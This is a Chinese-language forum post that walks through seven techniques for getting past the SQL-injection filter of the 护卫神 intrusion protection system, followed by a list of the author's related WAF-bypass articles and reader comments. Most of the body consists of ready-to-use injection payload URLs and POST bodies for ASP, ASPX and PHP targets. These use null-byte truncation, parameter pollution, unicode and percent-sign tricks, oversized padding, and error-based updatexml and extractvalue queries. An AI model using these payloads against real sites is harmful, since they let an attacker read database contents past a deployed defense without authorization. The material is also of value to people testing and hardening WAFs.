Bypass 护卫神SQL注入防御(多姿势)
0x00 前言
护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能。
这边主要分享一下几种思路,Bypass 护卫神SQL注入防御。
0x01 环境搭建
护卫神官网:http://www.huweishen.com
软件版本:护卫神·入侵防护系统 V3.8.1 最新版本
下载地址:http://down.huweishen.com/hws.zip
测试环境:IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL
0x02 WAF测试
护卫神SQL防注入的规则几年了基本都没有什么变化,先来一张拦截测试图:
姿势一:%00截断
%00截断是上传漏洞中常用的一个非常经典的姿势,在SQL注入中,也可以用来Bypass。
在WAF层,接收参数id后,遇到%00截断,只获取到 id=1,无法获取到后面的有害参数输入;
在ASPX+MSSQL中,支持%00来代替空白字符,构造的SQL语句得以成功执行,获取数据。
http://192.168.204.132/sql.aspx?id=1%00and 1=2 union select 1,2,column_name from information_schema.columns
在PHP+Mysql中,可以用/*%00*/
,同样可以进行Bypass。
/sql.php?id=1/*%00*/union select 1,schema_name,3 from information_schema.schemata
姿势二:GET+POST
当同时提交GET、POST请求时,进入POST逻辑,而忽略了GET请求的有害参数输入,可轻易Bypass。
在IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL 均适用。
http://192.168.204.132/sql.aspx?id=1 and 1=2 union select 1,column_name,3 from information_schema.columns
POST:aaa
姿势三:unicode编码
IIS服务器支持对于unicode的解析,对关键词进行unicode编码绕过。
http://192.168.204.132/sql.aspx?id=1 and 1=2 union s%u0045lect 1,2,column_name from information_schema.columns
姿势四:ASPX+HPP
在ASPX中,有一个比较特殊的HPP特性,当GET/POST/COOKIE同时提交的参数id,服务端接收参数id的顺序GET,POST,COOKIE,中间通过逗号链接 。
UNION、SELECT、两个关键字拆分放在GET/POST的位置,通过ASPX的这个特性连起来,姿势利用有点局限,分享一下Bypass思路。
http://192.168.204.132/sql.aspx?id=1 and 1=2 union/*
POST:id=*/select 1,column_name,3 from information_schema.columns
姿势五:ASP %特性
在IIS+ASP中,当我们输入un%ion,解析的时候会去掉%号,服务端接收的参数是union。
http://192.168.204.132/sql.asp?id=1 and 1=2 un%ion select 1,2,column_name from information_schema.columns
姿势六:缓冲区溢出
在PHP+Mysql中,使用POST 大包溢出的思路可成功Bypass。
http://192.168.204.132/sql.php
POST:id=1 and (select 1)=(Select 0xA*49099) union select 1,schema_name,3 from information_schema.SCHEMATA
编写一个简单的Python脚本,当A的个数填充到49099时,可成功Bypass。
姿势七:黑名单绕过
护士神SQL防注入,采用的是黑名单过滤,关键字并不全,比如只过滤union select,select from却放过了,那么这里就存在很多种绕过的形式。
基本上报错注入、盲注、延迟注入都可以很轻易Bypass,这时候直接利用SQLMAP,指定注入方式来获取数据。
?id=1 or (select 1 from (select count(2))x from information_schema.tables group by x)a)
?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))
?id=1 and extractvalue(1, concat(0x5c, (select VERSION() from information_schema.tables limit 1)))
0x03 END
立下的flag,开始继续更新我的WAF Bypass系列。。
梳理了一下自己写过的WAF Bypass相关的文章,按照编写时间顺序,整理成了一个WAF Bypass实战系列,如果你准备了解WAF攻防这一块的内容,可以来了解一下。
第一篇:《BypassD盾IIS防火墙SQL注入防御(多姿势)》
2017年9月中旬写的,记录在博客园,后注册了一个马甲,发表到先知社区。
2018年3月,又写了一篇关于新版D盾的绕过思路:《分享一个Bypass D盾_防火墙(新版)SQL注入防御的思路》 https://www.t00ls.com/thread-44628-1-1.html
第二篇:《《Bypass X-WAF SQL注入防御(多姿势)》》
https://www.t00ls.com/thread-45302-1-1.html
2018年4月,写了一篇《X-WAF:一款适合练手的云WAF》,从代码出发,一步步理解WAF的工作原理,进行WAF Bypass。
第三篇:《Bypass ngx_lua_waf SQL注入防御(多姿势)》
https://www.t00ls.com/thread-45736-1-1.html
2018年5月,分享了三种另类思路 Bypass ngx_lua_waf 。
第四篇:《Bypass 360主机卫士SQL注入防御(多姿势)》
https://www.t00ls.com/thread-45943-1-1.html
2018年5月,分享了八种关于360主机卫士的绕过思路以及自动化Bypass的两种利用方法。
第五篇:《Bypass 护卫神SQL注入防御(多姿势)》
2018年6月,分享了七种姿势的绕过思路,此篇。
番外篇:《打破基于OpenResty的WEB安全防护(CVE-2018-9230)》
https://www.anquanke.com/post/id/103771
自拍TCV:1
评论25次
干货满满啊,感谢分享~点赞点赞
很赞的xi列教程 ...
溢出,截断等姿势确实挺亮得嘛
这个可以,以后遇到又多了些思路
楼主的字符长度100绕过防护waf的方法,好像在老外的社区内有人讲过,
get post同时提交bypass有点凶
缓冲区溢出是怎么搞出来的啊
截图不是附带的python脚本 不停在填充A ,另外这个还有个基础知识,windows+IIS接受参数长度1024,linux参数长度4096,可以直接在1000+ 4000+的位置测。
很有干货的xi列教程,后续的WAF Bypassxi列已经成功吊足了胃口,期待ing
楼主,文章思路调理清晰,还有waf bypass总结,赞一个。
学xi了,谢谢作者
谢谢作者的归纳,本菜最近在研究怎么绕过狗,现在又了题材谢谢了
很好,比较全的总结了asp常见漏洞利用
老哥厉害。那么多环境你是怎么装的?虚拟机吗?
试试同时bypass两个狗 上次遇到同时安了两个waf。。。。。
缓冲区溢出是怎么搞出来的啊
超长字节
什么情况 难道触发采集规则了?
@Calm @seaman @WestDog @这只猪 就是中午刚发表完文章,想看看排版是否有问题,奈何家里网络太差,图片一直加载不出来,手贱多刷新了几次,不小心触发采集规则了。。。
期待大佬关于文件上传的绕过文章说明
%00 这个 原因是waf解析url截断的话 那么是不是对于安装护卫神的任意类型 服务器都生效。。
期待Bypass云锁的文章: 《Bypass 云锁 SQL注入防御(多姿势)》
目测是触发采集规则了